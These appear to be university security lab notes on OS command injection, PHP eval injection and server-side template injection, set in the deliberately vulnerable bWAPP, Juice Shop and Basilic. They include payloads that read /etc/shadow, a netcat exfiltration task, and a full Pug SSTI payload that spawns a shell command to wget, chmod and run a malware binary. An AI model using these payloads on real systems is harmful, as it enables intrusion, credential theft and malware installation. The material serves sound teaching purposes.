OS Injections
Lecture Notes
This lecture will present an overview over OS specific injections.
Download here
Practical tasks
bWAPP
OS Command Injection
This lab will address Injection vulnerabilities and in particular OS Command Injection vulnerabilities. Take notes of your actions as you execute the lab, including the barriers found and how you overcame them.
Head for the bWAPP virtual machine, login and select the OS Command Injection
exercises.
You will be presented with a dialog asking for a address. The purpose is to issue a nslookup
with that address.
You can expect that the application will execute the nslookup
command, plus the text provided by the user. The different security levels will add additional checks and limit the characters that can be used.
For reference you can follow the code in Sonarcloud.
A basic payload would be ; id
, which effectively results in nslookup ; id
and will execute two commands.
The security levels will imply the following limitations:
- low: no checks
- medium:
&
and;
are not allowed. - high: uses the PHP function
escapeshellcmd
. Following characters are preceded by a backslash:&#;`|*?~<>^()[]{}$\, \x0A\xFF
.'
and"
are escaped only if they are not paired.
Tasks:
- Use a payload and show the content of the
/etc/shadow
file. - Try other commands. If you wish to test writes to the filesystem, use
/tmp
. - Increase the security level to
MEDIUM
and repeat the attack
Follow to the OS Command Injection - Blind
. Blind command injection occurs when the system call that’s being made does not return the response of the call to the Document Object Model. Means when the command output is not displayed to us in the webpage, now how can we get to know that there is OS command injection when there is no output shown?
Try with an IP
address of your choice and see what happens. Maybe you can try the IP
address you have inside the VPN. Now start Wireshark
and check if you receive a packet.
An attack will not present the result directly, but it may produce a result that is available on the machine or is sent remotely. Can you think about a payload to do this? As a hint consider the use of netcat
, which can send any content to a remote server. You may need a simple web server in your host. python3 -m http.server
may help.
Tasks
- Evaluate what can be done with the input field
- Devise a payload that runs a command and send the output to your server
- Increase the security level and repeat the attack
- Enumerate the server folders
PHP Code Injection
The objective of these exercises is similar to the previous, but instead of injecting commands that will run on the bash, there will be a vulnerability which allows injecting PHP
code.
You can explore the code in the Sonarcloud instance, which is correctly identified as vulnerable. The issue in this case is the use of the eval
keyword. Please check the documentation of this function, in particular, the warning that is presented there.
In this exercise, the page will accept one argument named message
with a text. The text is evaluated inside PHP
without the proper checks (excluding the fact that eval
should not be used).
This exercise will only execute on the LOW
security level.
Tasks
- Create a payload that can be injected in this argument. As harmless functions check
phpinfo()
orecho
.
OS Command Injection
For these tasks either install the software of access the Multi App VM in the laboratory.
Juice Shop
Juice Shop is vulnerable to injection attacks, through a specific technique called Server Side Template Injection. These attacks are possible as webpages are composed by dynamic values added to a static template. The template contains HTML, which is modified dynamically with data specific to each request. If an attacker can control what data is added, it can exfiltrate information from a server, or even execute commands remotely.
With SSTI, once the threat actors identify the template engine, they can also gain further control of the server by using the remote code execution exploit. The untrusted users can identify the objects, methods and properties. Such exposure can further lead to information disclosure about application passwords, application programming interface keys and more.
Therefore, an SSTI vulnerability targeting the template engines and allowing untrusted users to edit templates introduces an array of serious risks. It is important for developers to take remediation steps that depend upon the different template engines in place.
To execute an SSTI attack against Juice shop, follow these instructions:
-
Perform the totally obvious Google search for
juicy malware
to find https://github.com/J12934/juicy-malware -
Your goal is to use RCE to make the server download and execute the malware version for the server OS, so on Linux you might want to run something like
wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware
-
You probably realized by now that
/profile
is not an Angular page? This page is written using Pug which happens to be a Template engine and therefore perfectly suited for SSTI mischief. -
Set your Username to
1+1
and click Set Username. Your username will be just shown as1+1
under the profile picture. -
Trying template injection into Pug set Username to
#{1+1}
and click Set Username. Your username will now be shown as 2 under the profile picture! In reality the content of your username was executed in the server. An addition is armless, but other code can be executed. -
Craft a payload that will abuse the lack of encapsulation of JavaScript’s
global.process
object to dynamically load a library that will allow you to spawn a process on the server that will then download and execute the malware. -
The payload might look like
#{global.process.mainModule.require('child_process').exec('wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware')}
. Submit this as Username and (on a Linux server) the challenge should be marked as solved -
As you are able to execute this command, you can also execute other commands. In fact, you are including Javascript, and then spawning a full blown command execution.
How to Remediate SSTI
The following remediation steps are abstract and can be applied to any template engine.
Sanitization
Templates should not be created from user-controlled input. User input should be passed to the template using template parameters. Sanitize the input before passing it into the templates by removing unwanted and risky characters before parsing the data. This minimizes the vulnerabilities for any malicious probing of your templates.
Sandboxing
If allowing certain risky characters is a business requirement to render certain attributes of a template, assume that malicious code execution is inevitable. Then, sandboxing the template environment in a docker container is probably a safer option. With this option, you can use docker security to craft a secure environment that limits any malicious activities.
With these things in mind, you’ll be able to look out for and remediate SSTI vulnerabilities while still taking advantage of what server-side templates have to offer.
Basilic
Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options.
Basilic requires PHP, Apache, and MySQL for the proper installation and configuration.
Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL:
http://www.securityfocus.com/bid/54234/exploit
The exploit URL provides the vulnerable URL that leads to the Remote Code Execution (RCE).
The exploit helps to determine that the diff.php
file is vulnerable to input handling and it is present in the /Config
. In particular, the application seems to be vulnerable to injection through the file
argument.
Tasks
- Explore the vulnerability present in this software, by injecting an OS command.
- Download Basilic from this url and analyze the content of the
Config/diff.php
file. - Explain why the vulnerability is present.